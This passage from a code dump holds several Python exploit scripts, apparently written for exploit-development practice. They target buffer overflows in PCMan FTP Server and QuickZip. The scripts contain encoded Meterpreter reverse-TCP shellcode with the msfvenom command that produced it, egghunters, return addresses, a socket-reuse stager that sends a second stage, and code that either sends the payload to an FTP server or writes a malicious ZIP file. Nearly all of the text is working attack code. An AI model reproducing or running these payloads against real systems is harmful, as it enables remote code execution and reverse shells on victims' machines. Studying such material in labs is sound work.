 55 | rev_met_7887 += "\x19\xe8\x24\xc7\x33\xac\xf8\xc8\xb0\x75\x0b"
 56 | rev_met_7887 += "\xb2\xb9\x8a\xec\x43\xd0\xee\xed\x43\xdc\x10"
 57 | rev_met_7887 += "\xd2\x95\xe5\x66\x15\x26\x52\x78\x20\x0b\xf3"
 58 | rev_met_7887 += "\x13\x4a\x1f\x03\x36"
 59 | 
 60 | ###################### SOCKET(2,1,6) ###################################
 61 | block1 = "\x83\xEC\x7C"           # SUB ESP,7C; 
 62 | block1 += "\xBB\x44\x34\x34\x40"  # MOV EBX,40343444
 63 | block1 += "\xC1\xEB\x08"          # SHR EBX,8
 64 | block1 += "\xB0\x06\x50"          # MOV AL,6; PUSH EAX
 65 | block1 += "\xB0\x01\x50"          # MOV AL,1; PUSH EAX
 66 | block1 += "\x40\x50"          # MOV AL,2; PUSH EAX
 67 | block1 += "\xFF\xD3"              # CALL EBX - 
 68 | 
 69 | ###################### BIND(Handle:EDI,SocketAddr:ECX,Length:10) ########
 70 | block1 += "\x8B\xF8"              # MOV EDI,EAX
 71 | block1 += "\x8B\xCB"              # MOV ECX,EBX
 72 | block1 += "\xB5\x74"              # MOV CH,74; GET SOCKET ADDR 
 73 | block1 += "\xFE\x41\x03"          # INC BYTE PTR DS:[ECX+3]; Incr Port #
 74 | block1 += "\xB3\x54"              # MOV BL,54; Points to Bind; 
 75 | block1 += "\x6A\x10"              # PUSH 10
 76 | block1 += "\x51"                  # PUSH ECX
 77 | block1 += "\x57"                  # PUSH EDI
 78 | block1 += "\xFF\xD3" 
 79 | 
 80 | ###################### Listen(Backlog, Handler) ########################## 
 81 | block1 += "\xB3\x5C"              # MOV BL,5C
 82 | block1 += "\x6A\x7F"              # PUSH 7F
 83 | block1 += "\x57"                  # PUSH EDI
 84 | block1 += "\xFF\xD3"              # CALL EBX
 85 | 
 86 | ###################### Accept(Handler, NULL, NULL) ########################
 87 | block1 += "\xB3\x24"              # MOV BL,24
 88 | block1 += "\x57"                  # PUSH EDI
 89 | block1 += "\xFF\xD3"              # CALL EBX
 90 | 
 91 | ###################### Malloc(Handler, NULL, NULL) ######################## 
 92 | 
 93 | block1 += "\x8B\xF8"              # MOV EDI,EAX
 94 | block1 += "\x66\xBB\xD4\x3D"      # MOV BX,3DD4
 95 | block1 += "\x8A\xE0"              # MOV AH, AL ; Size Fudging for Malloc
 96 | block1 += "\x50"                  # PUSH EAX
 97 | block1 += "\xFF\xD3"              # CALL EBX; 
 98 | block1 += "\xEB\x9D"              # JMP to block2 
 99 | 
100 | ###################### VirtualProtect ######################## 
101 | block2 = "\x59"                   #    POP ECX
102 | block2 += "\x51"                  #    PUSH ECX
103 | block2 += "\x8B\xF0"              #    MOV ESI,EAX
104 | block2 += "\x50"                  #    PUSH EAX
105 | block2 += "\x66\xBB\xA4\x3E"      #    MOV BX,3EA4
106 | block2 += "\x8D\x44\x24\xDC"      #    LEA EAX,DWORD PTR SS:[ESP+24]
107 | block2 += "\x50"                  #    PUSH EAX
108 | block2 += "\x6A\x40"              #    PUSH 40
109 | block2 += "\x51"                  #    PUSH ECX
110 | block2 += "\x56"                  #    PUSH ESI
111 | block2 += "\xFF\xD3"              #    CALL EBX
112 | 
113 | ###################### Recv ######################## 
114 | block2 += "\x66\xBB\xDC\x82"                   # MOV BX, 0x82DC
115 | block2 += "\x57" 
116 | block2 += "\xEB\x05"
117 | 
118 | tucked = "\xFF\x13"
119 | tucked += "\xFF\xE6"
120 | 
121 | payload = "Z" * start_offset
122 | payload += block2
123 | payload += "D" * (eip_offset - len(payload))
124 | payload += jmp_esp
125 | payload += tucked 
126 | payload += block1
127 | payload += "E" * (max - len(payload))
128 | 
129 | print "[*] payload {0} chars...".format(len(payload))
130 | fuzz(payload, port)
131 | sleep(1)
132 | fuzz(rev_met_7887, port+1, False)
133 | 
134 | # 00403434   $-FF25 E4824000  JMP DWORD PTR DS:[<&WS2_32.socket>]      ;  WS2_32.socket (2, 1 ,6)
135 | # 00403454   $-FF25 B8824000  JMP DWORD PTR DS:[<&WS2_32.bind>]        ;  WS2_32.bind
136 | # 0040345C   $-FF25 D4824000  JMP DWORD PTR DS:[<&WS2_32.listen>]      ;  WS2_32.listen
137 | # 00403424   $-FF25 B4824000  JMP DWORD PTR DS:[<&WS2_32.accept>]      ;  WS2_32.accept
138 | # 0040340C   $-FF25 DC824000  JMP DWORD PTR DS:[<&WS2_32.recv>]        ;  WS2_32.recv
139 | # 00403DD4   $-FF25 70824000  JMP DWORD PTR DS:[<&msvcrt.malloc>]      ;  msvcrt.malloc
140 | # 00403EA4   $-FF25 E4814000  JMP DWORD PTR DS:[<&KERNEL32.VirtualProt>;  kernel32.VirtualProtect
141 | 
142 | 
143 | 
144 | 
145 | 
146 | 
147 | 


--------------------------------------------------------------------------------
/pcman_ftp.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | import socket
  3 | from struct import pack
  4 | 
  5 | host = '172.16.192.177'
  6 | port = 21
  7 | 
  8 | max_size = 3000
  9 | 
 10 | 
 11 | # encoded_calc_esi  =  "w00tw00t"
 12 | # encoded_calc_esi += "\x57\x58\x04\x07\x50\x5E\x90"
 13 | # encoded_calc_esi += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49"
 14 | # encoded_calc_esi += "\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51"
 15 | # encoded_calc_esi += "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
 16 | # encoded_calc_esi += "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
 17 | # encoded_calc_esi += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
 18 | # encoded_calc_esi += "\x4a\x49\x4a\x4b\x57\x6b\x63\x6b\x75\x61"
 19 | # encoded_calc_esi += "\x59\x50\x36\x30\x44\x71\x6b\x70\x6c\x48"
 20 | # encoded_calc_esi += "\x77\x33\x47\x63\x33\x63\x4f\x4b\x6c\x6d"
 21 | # encoded_calc_esi += "\x57\x53\x4c\x46\x33\x4c\x79\x6f\x69\x43"
 22 | # encoded_calc_esi += "\x54\x71\x39\x50\x32\x70\x6f\x4b\x48\x7a"
 23 | # encoded_calc_esi += "\x6b\x7a\x4f\x71\x51\x6c\x49\x6f\x78\x53"
 24 | # encoded_calc_esi += "\x38\x68\x6d\x30\x6b\x4f\x59\x6f\x59\x6f"
 25 | # encoded_calc_esi += "\x72\x43\x52\x4d\x43\x54\x36\x4e\x62\x45"
 26 | # encoded_calc_esi += "\x34\x38\x32\x45\x37\x50\x44\x6f\x50\x63"
 27 | # encoded_calc_esi += "\x67\x50\x53\x53\x55\x31\x30\x6c\x53\x53"
 28 | # encoded_calc_esi += "\x66\x4e\x73\x55\x54\x38\x65\x35\x41\x41"
 29 | 
 30 | encoded_calc_esi  =  "w00tw00t"
 31 | encoded_calc_esi += "\x57\x58\x04\x08\x50\x5E\x90"
 32 | encoded_calc_esi += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49"
 33 | encoded_calc_esi += "\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51"
 34 | encoded_calc_esi += "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
 35 | encoded_calc_esi += "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
 36 | encoded_calc_esi += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
 37 | encoded_calc_esi += "\x4a\x49\x4a\x4b\x37\x6b\x61\x4b\x45\x61"
 38 | encoded_calc_esi += "\x49\x50\x50\x50\x75\x61\x39\x50\x4f\x78"
 39 | encoded_calc_esi += "\x31\x53\x32\x33\x52\x73\x4f\x4b\x4e\x4d"
 40 | encoded_calc_esi += "\x76\x43\x6c\x46\x71\x6c\x49\x6f\x38\x53"
 41 | encoded_calc_esi += "\x74\x71\x39\x50\x42\x70\x6f\x4b\x49\x6a"
 42 | encoded_calc_esi += "\x6a\x6a\x4e\x61\x73\x4c\x59\x6f\x39\x43"
 43 | encoded_calc_esi += "\x5a\x48\x6d\x30\x69\x6f\x4b\x4f\x39\x6f"
 44 | encoded_calc_esi += "\x52\x43\x50\x6d\x33\x54\x34\x6e\x43\x55"
 45 | encoded_calc_esi += "\x44\x38\x75\x35\x65\x70\x64\x6f\x70\x63"
 46 | encoded_calc_esi += "\x37\x50\x50\x63\x55\x31\x30\x6c\x72\x43"
 47 | encoded_calc_esi += "\x76\x4e\x70\x65\x34\x38\x70\x65\x41\x41"
 48 | 
 49 | 
 50 | # msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.192.212 LPORT=7887 -b "\x00\x0a\x0d" -a x86 --platform windows -f py -v rev_met_7887_esi bufferregister=ESI
 51 | 
 52 | magic  = "\x8B\xC3"	               #   MOV EAX,EBX
 53 | magic += "\x05\x99\x99\x11\x11"    #   ADD EAX,11119999
 54 | magic += "\x2D\x99\x75\x11\x11"    #   SUB EAX,11117999
 55 | magic += "\x2B\xE0"            #   SUB ESP,EAX
 56 | magic += "\x57"    			  #   PUSH EDI
 57 | magic += "\x58"			      #   POP EAX
 58 | magic += "\x04\x17"		      #   ADD AL,0F
 59 | magic += "\x50"			      #   PUSH EAX
 60 | magic += "\x5E"			      #   POP ESI
 61 | magic += "\x90"	              #   NOP
 62 | magic += "\x56"	              #   PUSH ESI
 63 | magic += "\x59"			      #   POP ECX
 64 | 
 65 | rev_met_7887_esi =  "w00tw00t"
 66 | rev_met_7887_esi += magic
 67 | print "Number of bytes of magic: " + str(len(magic))
 68 | rev_met_7887_esi += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49"
 69 | rev_met_7887_esi += "\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51"
 70 | rev_met_7887_esi += "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
 71 | rev_met_7887_esi += "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
 72 | rev_met_7887_esi += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
 73 | rev_met_7887_esi += "\x4a\x49\x69\x6c\x4d\x38\x6d\x52\x53\x30"
 74 | rev_met_7887_esi += "\x53\x30\x55\x50\x31\x70\x4f\x79\x6a\x45"
 75 | rev_met_7887_esi += "\x74\x71\x79\x50\x52\x44\x6e\x6b\x62\x70"
 76 | rev_met_7887_esi += "\x54\x70\x6e\x6b\x73\x62\x64\x4c\x4c\x4b"
 77 | rev_met_7887_esi += "\x70\x52\x62\x34\x6e\x6b\x72\x52\x36\x48"
 78 | rev_met_7887_esi += "\x64\x4f\x4f\x47\x62\x6a\x57\x56\x34\x71"
 79 | rev_met_7887_esi += "\x49\x6f\x4e\x4c\x47\x4c\x43\x51\x51\x6c"
 80 | rev_met_7887_esi += "\x56\x62\x46\x4c\x71\x30\x4f\x31\x78\x4f"
 81 | rev_met_7887_esi += "\x64\x4d\x53\x31\x7a\x67\x39\x72\x78\x72"
 82 | rev_met_7887_esi += "\x72\x72\x50\x57\x6e\x6b\x32\x72\x34\x50"
 83 | rev_met_7887_esi += "\x4e\x6b\x31\x5a\x55\x6c\x6e\x6b\x32\x6c"
 84 | rev_met_7887_esi += "\x76\x71\x61\x68\x39\x73\x47\x38\x76\x61"
 85 | rev_met_7887_esi += "\x58\x51\x30\x51\x4e\x6b\x73\x69\x51\x30"
 86 | rev_met_7887_esi += "\x77\x71\x79\x43\x6e\x6b\x73\x79\x56\x78"
 87 | rev_met_7887_esi += "\x68\x63\x66\x5a\x33\x79\x4c\x4b\x54\x74"
 88 | rev_met_7887_esi += "\x6c\x4b\x73\x31\x6a\x76\x35\x61\x6b\x4f"
 89 | rev_met_7887_esi += "\x4c\x6c\x59\x51\x6a\x6f\x36\x6d\x36\x61"
 90 | rev_met_7887_esi += "\x59\x57\x76\x58\x79\x70\x42\x55\x5a\x56"
 91 | rev_met_7887_esi += "\x57\x73\x33\x4d\x58\x78\x35\x6b\x43\x4d"
 92 | rev_met_7887_esi += "\x35\x74\x31\x65\x79\x74\x36\x38\x4c\x4b"
 93 | rev_met_7887_esi += "\x76\x38\x64\x64\x35\x51\x6e\x33\x71\x76"
 94 | rev_met_7887_esi += "\x4e\x6b\x36\x6c\x72\x6b\x6c\x4b\x30\x58"
 95 | rev_met_7887_esi += "\x45\x4c\x67\x71\x68\x53\x6c\x4b\x45\x54"
 96 | rev_met_7887_esi += "\x4e\x6b\x36\x61\x4e\x30\x4e\x69\x67\x34"
 97 | rev_met_7887_esi += "\x55\x74\x64\x64\x63\x6b\x53\x6b\x71\x71"
 98 | rev_met_7887_esi += "\x61\x49\x62\x7a\x63\x61\x39\x6f\x59\x70"
 99 | rev_met_7887_esi += "\x33\x6f\x73\x6f\x62\x7a\x6e\x6b\x57\x62"
100 | rev_met_7887_esi += "\x58\x6b\x4c\x4d\x43\x6d\x30\x68\x50\x33"
101 | rev_met_7887_esi += "\x75\x62\x33\x30\x47\x70\x31\x78\x62\x57"
102 | rev_met_7887_esi += "\x53\x43\x66\x52\x53\x6f\x52\x74\x32\x48"
103 | rev_met_7887_esi += "\x42\x6c\x63\x47\x57\x56\x37\x77\x6e\x69"
104 | rev_met_7887_esi += "\x4d\x38\x39\x6f\x48\x50\x48\x38\x6e\x70"
105 | rev_met_7887_esi += "\x67\x71\x53\x30\x63\x30\x71\x39\x5a\x64"
106 | rev_met_7887_esi += "\x61\x44\x46\x30\x35\x38\x31\x39\x6d\x50"
107 | rev_met_7887_esi += "\x32\x4b\x37\x70\x39\x6f\x79\x45\x71\x7a"
108 | rev_met_7887_esi += "\x46\x6a\x31\x78\x6c\x6c\x66\x70\x6f\x30"
109 | rev_met_7887_esi += "\x48\x54\x32\x48\x43\x32\x63\x30\x37\x6e"
110 | rev_met_7887_esi += "\x68\x4f\x6e\x69\x49\x76\x62\x70\x50\x50"
111 | rev_met_7887_esi += "\x30\x50\x72\x70\x73\x70\x72\x70\x57\x30"
112 | rev_met_7887_esi += "\x32\x70\x30\x68\x6b\x5a\x56\x6f\x69\x4f"
113 | rev_met_7887_esi += "\x4b\x50\x4b\x4f\x6b\x65\x6a\x37\x70\x6a"
114 | rev_met_7887_esi += "\x74\x50\x62\x76\x72\x77\x31\x78\x6c\x59"
115 | rev_met_7887_esi += "\x69\x35\x71\x64\x63\x51\x6b\x4f\x38\x55"
116 | rev_met_7887_esi += "\x6c\x45\x39\x50\x51\x64\x45\x5a\x49\x6f"
117 | rev_met_7887_esi += "\x30\x4e\x64\x48\x44\x35\x48\x6c\x4a\x48"
118 | rev_met_7887_esi += "\x51\x77\x45\x50\x63\x30\x67\x70\x33\x5a"
119 | rev_met_7887_esi += "\x55\x50\x53\x5a\x77\x74\x42\x76\x50\x57"
120 | rev_met_7887_esi += "\x30\x68\x64\x42\x6e\x39\x4b\x78\x51\x4f"
121 | rev_met_7887_esi += "\x49\x6f\x6e\x35\x6d\x53\x39\x68\x75\x50"
122 | rev_met_7887_esi += "\x31\x6e\x46\x56\x4e\x6b\x74\x76\x71\x7a"
123 | rev_met_7887_esi += "\x47\x30\x45\x38\x77\x70\x62\x30\x33\x30"
124 | rev_met_7887_esi += "\x37\x70\x46\x36\x50\x6a\x63\x30\x71\x78"
125 | rev_met_7887_esi += "\x31\x48\x49\x34\x72\x73\x6b\x55\x49\x6f"
126 | rev_met_7887_esi += "\x6a\x75\x6d\x43\x32\x73\x70\x6a\x33\x30"
127 | rev_met_7887_esi += "\x42\x76\x43\x63\x71\x47\x61\x78\x73\x32"
128 | rev_met_7887_esi += "\x78\x59\x69\x58\x43\x6f\x6b\x4f\x7a\x75"
129 | rev_met_7887_esi += "\x4b\x33\x49\x68\x67\x70\x51\x6d\x76\x48"
130 | rev_met_7887_esi += "\x76\x38\x45\x38\x75\x50\x47\x30\x43\x30"
131 | rev_met_7887_esi += "\x57\x70\x32\x4a\x63\x30\x52\x70\x53\x58"
132 | rev_met_7887_esi += "\x36\x6b\x36\x4f\x46\x6f\x76\x50\x49\x6f"
133 | rev_met_7887_esi += "\x5a\x75\x30\x57\x50\x68\x32\x55\x50\x6e"
134 | rev_met_7887_esi += "\x50\x4d\x55\x31\x79\x6f\x38\x55\x73\x6e"
135 | rev_met_7887_esi += "\x33\x6e\x49\x6f\x74\x4c\x34\x64\x34\x4f"
136 | rev_met_7887_esi += "\x6b\x35\x72\x50\x39\x6f\x49\x6f\x39\x6f"
137 | rev_met_7887_esi += "\x38\x69\x4f\x6b\x79\x6f\x69\x6f\x6b\x4f"
138 | rev_met_7887_esi += "\x76\x61\x6f\x33\x56\x49\x69\x56\x30\x75"
139 | rev_met_7887_esi += "\x4b\x71\x58\x43\x4d\x6b\x38\x70\x6e\x55"
140 | rev_met_7887_esi += "\x69\x32\x30\x56\x42\x4a\x45\x50\x43\x63"
141 | rev_met_7887_esi += "\x49\x6f\x6a\x75\x41\x41"
142 | 
143 | 
144 | 
145 | nops  = "w00tw00t" + "\x90" * 7
146 | calc  = nops 
147 | calc += "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x13\x53\xbb\xad\x23\x86\x7c"
148 | calc += "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
149 | calc += "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x61\x6c\x63\x2e\x65"
150 | calc += "\x78\x65"
151 | 
152 | # msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=EAX -a x86 --platform Windows -f python -v encoded_egg_hunter
153 | egghunter_encoded_eax =  ""
154 | egghunter_encoded_eax += "\x50\x59\x49\x49\x49\x49\x49\x49\x49"
155 | egghunter_encoded_eax += "\x49\x49\x49\x49\x49\x49\x49\x49\x49"
156 | egghunter_encoded_eax += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41"
157 | egghunter_encoded_eax += "\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
158 | egghunter_encoded_eax += "\x32\x42\x42\x30\x42\x42\x41\x42\x58"
159 | egghunter_encoded_eax += "\x50\x38\x41\x42\x75\x4a\x49\x55\x36"
160 | egghunter_encoded_eax += "\x6b\x31\x38\x4a\x69\x6f\x74\x4f\x43"
161 | egghunter_encoded_eax += "\x72\x33\x62\x32\x4a\x74\x42\x52\x78"
162 | egghunter_encoded_eax += "\x48\x4d\x54\x6e\x47\x4c\x65\x55\x62"
163 | egghunter_encoded_eax += "\x7a\x44\x34\x4a\x4f\x6c\x78\x70\x77"
164 | egghunter_encoded_eax += "\x54\x70\x74\x70\x51\x64\x4e\x6b\x69"
165 | egghunter_encoded_eax += "\x6a\x6e\x4f\x54\x35\x69\x7a\x4c\x6f"
166 | egghunter_encoded_eax += "\x71\x65\x78\x67\x59\x6f\x5a\x47\x41"
167 | egghunter_encoded_eax += "\x41"
168 | 
169 | egghunter_address = ""
170 | egghunter_address += "\x54"				        #   PUSH ESP
171 | egghunter_address += "\x58"					    #   POP EAX
172 | egghunter_address += "\x2D\x3A\x55\x55\x55"     #   SUB EAX,5555553A
173 | egghunter_address += "\x2D\x3A\x55\x55\x55"     #   SUB EAX,5555553A
174 | egghunter_address += "\x2D\x3C\x55\x55\x55"     #   SUB EAX,5555553C
175 | 
176 | # 0x0043410d : jmp esp | startnull,ascii {PAGE_EXECUTE_READ} [PCManFTPD2.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.0 (C:\Documents and Settings\Administrator\My Documents\Downloads\pcman\PCManFTPD2.exe)
177 | jmp_esp = pack("<L", 0x74e32fd9)
178 | 
179 | eip_offset = 2005
180 | esp_offset = 2013
181 | esi_offset = 2025
182 | 
183 | payload  = "A" * 30
184 | payload += rev_met_7887_esi
185 | print "[+] Length of calc: {0}".format(str(len(rev_met_7887_esi)))
186 | payload += "A" * (eip_offset -len(payload))
187 | payload += jmp_esp
188 | payload += "CCCC"
189 | payload += egghunter_address
190 | payload += "A" * (80 - len(egghunter_address))	
191 | payload += egghunter_encoded_eax
192 | payload += "C" * (max_size - len(payload))
193 | 
194 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
195 | s.connect((host, port))
196 | print s.recv(4096)
197 | s.send("USER anonymous\r\n")
198 | print s.recv(4096)
199 | s.send("PASS\r\n")
200 | print s.recv(4096)
201 | print "[*] Sending payload of size: {0} chars...".format(len(payload))
202 | s.send("PORT " + payload + "\r\n")
203 | s.close()
204 | 
205 | # EMULATING SCENARIO 1:
206 | #	- Alphanumeric Restriction
207 | #	- Limited Space (Egghunter)
208 | # 	 


--------------------------------------------------------------------------------
/quickzip_backup_no_pop_esp.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from os import remove
 4 | from struct import pack
 5 | 
 6 | filename = "zipper_bomb.zip"
 7 | payload_ext = ".txt"
 8 | nseh_offset = 1022
 9 | as_offset = 899
10 | bs_offset = 123
11 | max_size = 4068
12 | ldf_header = (
13 |     "\x50\x4B\x03\x04\x14\x00\x00"
14 |     "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
15 |     "\x00\x00\x00\x00\x00\x00\x00\x00"
16 |     "\xe4\x0f"  # file size
17 |     "\x00\x00\x00"
18 | )
19 | 
20 | cdf_header = (
21 |     "\x50\x4B\x01\x02\x14\x00\x14"
22 |     "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
23 |     "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
24 |     "\xe4\x0f"  # file size
25 |     "\x00\x00\x00\x00\x00\x00\x01\x00"
26 |     "\x24\x00\x00\x00\x00\x00\x00\x00"
27 | )
28 | 
29 | eofcdf_header = (
30 |     "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
31 |     "\x12\x10\x00\x00"  # Size of central directory (bytes)
32 |     "\x02\x10\x00\x00"  # Offset of start of central directory,
33 |     # relative to start of archive
34 |     "\x00\x00"
35 | )
36 | 
37 | #bytear = ("xxxxxxxxxxxxxxxxx\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f")
38 | encoded_egghunter = "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI0fNazj9oTOCrsb3Zc2BxHMFN7LUUbz1dJOH8agP0Dpd4nkJZLorUYznOD5KW9oIwAA"
39 | encoded_edi = "\x2D\x30\x58\x4E\x55"     #SUB EAX, 554E5830
40 | encoded_edi += "\x2D\x30\x58\x4E\x55"     #SUB EAX, 554E5830
41 | encoded_edi += "\x2D\x30\x5A\x50\x55"     #SUB EAX, 55505A30
42 | encoded_edi += "\x50"     #PUSH EAX
43 | encoded_edi += "\x5F\x54\x58"     #POP EDI
44 | 
45 | decode_stack  = "\x2d\x60\x52\x55\x55"
46 | decode_stack += "\x2d\x60\x52\x55\x55"
47 | decode_stack += "\x2d\x60\x52\x55\x55"
48 | decode_stack += "\x50"
49 | decode_stack += "\x50"
50 | 
51 | 
52 | jmp_edi = "\x25\x4a\x4d\x4e\x55" # AND EAX,0x554E4D4A
53 | jmp_edi += "\x25\x35\x32\x31\x2a" # AND EAX,0x2A313235
54 | jmp_edi += "\x2d\x25\x25\x55\x5d" # SUB EAX,0x5d552525
55 | jmp_edi += "\x2d\x25\x25\x55\x5d" # SUB EAX,0x5d552525
56 | jmp_edi += "\x2d\x26\x25\x56\x5d" # SUB EAX,0x5d562526
57 | jmp_edi += "\x50"
58 | 
59 | 
60 | payload  = "Z" * 103
61 | payload += encoded_egghunter
62 | payload += "Z" * (as_offset - len(payload))
63 | print "Size of payload: " + str(len(payload))
64 | payload += "BBBB"
65 | payload += encoded_edi
66 | payload += decode_stack
67 | payload += jmp_edi
68 | payload += "B" * (119-len(encoded_edi) - len(jmp_edi) -len(decode_stack))
69 | print "Size of payload: " + str(len(payload))
70 | payload += "\x71\x9F\x70\x9F"
71 | payload += pack("<L", 0x00451845)
72 | payload += "D" * (max_size - len(payload) - len(payload_ext))
73 | 
74 | payload = payload + payload_ext
75 | payload_len = len(payload)
76 | 
77 | print("[*] Size : {length} bytes".format(length=payload_len))
78 | print("[*] Removing old {filename} file".format(filename=filename))
79 | try:
80 |     remove(filename)
81 | except OSError:
82 |     print("[!] Couldn't remove, probably doesn't exist. Ignoring this error")
83 |     pass
84 | print("[*] Creating new {filename} file".format(filename=filename))
85 | with open(filename, "w") as f:
86 |     file_content = ldf_header + payload + cdf_header + payload + eofcdf_header
87 |     f.write(file_content)
88 | 
89 | 


--------------------------------------------------------------------------------
/quickzip_redo.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | from os import remove
  4 | from struct import pack
  5 | 
  6 | filename = "stacktrac3_b00m.zip"
  7 | max_size = 4064
  8 | nseh_offset = 294
  9 | split = 171
 10 | 
 11 | ldf_header = (
 12 |     "\x50\x4B\x03\x04\x14\x00\x00"
 13 |     "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
 14 |     "\x00\x00\x00\x00\x00\x00\x00\x00"
 15 |     "\xe4\x0f"  # file size
 16 |     "\x00\x00\x00"
 17 | )
 18 | 
 19 | cdf_header = (
 20 |     "\x50\x4B\x01\x02\x14\x00\x14"
 21 |     "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
 22 |     "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 23 |     "\xe4\x0f"  # file size
 24 |     "\x00\x00\x00\x00\x00\x00\x01\x00"
 25 |     "\x24\x00\x00\x00\x00\x00\x00\x00"
 26 | )
 27 | 
 28 | eofcdf_header = (
 29 |     "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
 30 |     "\x12\x10\x00\x00"  # Size of central directory (bytes)
 31 |     "\x02\x10\x00\x00"  # Offset of start of central directory,
 32 |     # relative to start of archive
 33 |     "\x00\x00"
 34 | )
 35 | 
 36 | rev_met_7887 =  "w00tw00t"
 37 | rev_met_7887 += "\x89\xe2\xdb\xd2\xd9\x72\xf4\x5d\x55\x59\x49"
 38 | rev_met_7887 += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43"
 39 | rev_met_7887 += "\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50"
 40 | rev_met_7887 += "\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
 41 | rev_met_7887 += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38"
 42 | rev_met_7887 += "\x41\x42\x75\x4a\x49\x49\x6c\x4d\x38\x4e\x62"
 43 | rev_met_7887 += "\x33\x30\x33\x30\x73\x30\x63\x50\x6b\x39\x78"
 44 | rev_met_7887 += "\x65\x75\x61\x6b\x70\x30\x64\x6c\x4b\x56\x30"
 45 | rev_met_7887 += "\x46\x50\x6e\x6b\x36\x32\x54\x4c\x4c\x4b\x51"
 46 | rev_met_7887 += "\x42\x67\x64\x6e\x6b\x63\x42\x56\x48\x76\x6f"
 47 | rev_met_7887 += "\x4f\x47\x30\x4a\x75\x76\x45\x61\x69\x6f\x4e"
 48 | rev_met_7887 += "\x4c\x45\x6c\x73\x51\x61\x6c\x65\x52\x54\x6c"
 49 | rev_met_7887 += "\x61\x30\x7a\x61\x38\x4f\x46\x6d\x67\x71\x78"
 50 | rev_met_7887 += "\x47\x39\x72\x4a\x52\x31\x42\x42\x77\x4e\x6b"
 51 | rev_met_7887 += "\x53\x62\x62\x30\x6c\x4b\x73\x7a\x57\x4c\x4e"
 52 | rev_met_7887 += "\x6b\x30\x4c\x42\x31\x33\x48\x68\x63\x61\x58"
 53 | rev_met_7887 += "\x46\x61\x48\x51\x56\x31\x6c\x4b\x36\x39\x61"
 54 | rev_met_7887 += "\x30\x73\x31\x4e\x33\x6c\x4b\x32\x69\x42\x38"
 55 | rev_met_7887 += "\x7a\x43\x55\x6a\x71\x59\x6e\x6b\x30\x34\x6e"
 56 | rev_met_7887 += "\x6b\x65\x51\x5a\x76\x50\x31\x49\x6f\x4c\x6c"
 57 | rev_met_7887 += "\x39\x51\x4a\x6f\x76\x6d\x56\x61\x4f\x37\x54"
 58 | rev_met_7887 += "\x78\x6d\x30\x33\x45\x78\x76\x46\x63\x51\x6d"
 59 | rev_met_7887 += "\x5a\x58\x67\x4b\x51\x6d\x36\x44\x61\x65\x48"
 60 | rev_met_7887 += "\x64\x43\x68\x6c\x4b\x62\x78\x77\x54\x46\x61"
 61 | rev_met_7887 += "\x7a\x73\x51\x76\x6e\x6b\x34\x4c\x62\x6b\x4c"
 62 | rev_met_7887 += "\x4b\x46\x38\x55\x4c\x35\x51\x49\x43\x6c\x4b"
 63 | rev_met_7887 += "\x63\x34\x4c\x4b\x76\x61\x4e\x30\x4e\x69\x72"
 64 | rev_met_7887 += "\x64\x74\x64\x45\x74\x61\x4b\x51\x4b\x70\x61"
 65 | rev_met_7887 += "\x63\x69\x42\x7a\x73\x61\x79\x6f\x39\x70\x63"
 66 | rev_met_7887 += "\x6f\x63\x6f\x73\x6a\x6c\x4b\x77\x62\x78\x6b"
 67 | rev_met_7887 += "\x4e\x6d\x33\x6d\x52\x48\x76\x53\x44\x72\x63"
 68 | rev_met_7887 += "\x30\x75\x50\x35\x38\x63\x47\x70\x73\x54\x72"
 69 | rev_met_7887 += "\x53\x6f\x36\x34\x73\x58\x72\x6c\x43\x47\x57"
 70 | rev_met_7887 += "\x56\x33\x37\x4c\x49\x39\x78\x49\x6f\x68\x50"
 71 | rev_met_7887 += "\x6f\x48\x4a\x30\x63\x31\x75\x50\x43\x30\x71"
 72 | rev_met_7887 += "\x39\x68\x44\x46\x34\x76\x30\x45\x38\x45\x79"
 73 | rev_met_7887 += "\x6d\x50\x42\x4b\x37\x70\x39\x6f\x48\x55\x32"
